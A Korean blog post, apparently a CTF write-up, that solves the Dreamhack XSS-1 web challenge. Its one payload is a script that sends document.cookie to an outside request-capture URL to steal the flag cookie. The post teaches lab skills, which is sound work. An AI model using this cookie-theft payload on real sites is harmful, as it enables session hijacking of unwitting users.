-
XSS-1 문제풀이CTF 문제/Dreamhack - Web 2023. 4. 4. 08:47
Dreamhack 웹 Stage 4 -> XSS-1 문제풀이입니다
홈페이지로 접속을 하면 위와 같은 페이지를 만날 수 있다
1. 3개의 각 페이지를 방문해 본다
2. 2번째 페이지는 방문할 때마다 hello 메시지가 출력됨을 알 수 있다
3. 2번째 페이지에서 memo 뒤에 내가 원하는 문구를 적어서 보내니 내가 적은 문구가 적혀지는것을 확일 할 수 있다
4. dreamhack에서 제고하는 도구를 이용하여 풀기로 하였고
링크 생성을 하여서 https://imipdfr.request.dreamhack.games 라는 링크를 얻었다
5. 아래의 코드를 입력한 뒤(주소는 자신의 주소를 사용할 것) cookie 값을 가져오도록 한다
<script>location.href="https://imipdfr.request.dreamhack.games/?memo=" + document.cookie;</script>
6. 제출완료 후 dreamhack 도구로 들어가 보면 위와 같이 접속정보가 나와있다
7. 클릭해 보면 Flag 가 있는 것을 확인할 수 있다
728x90'CTF 문제 > Dreamhack - Web' 카테고리의 다른 글
CSRF-1 문제풀이 (0) 2023.04.29 XSS-2 문제풀이 (0) 2023.04.04 Cookie 문제풀이 (0) 2023.04.01 Session-basic 문제풀이 (0) 2023.03.31 devtools-sources 문제풀이 (0) 2023.03.31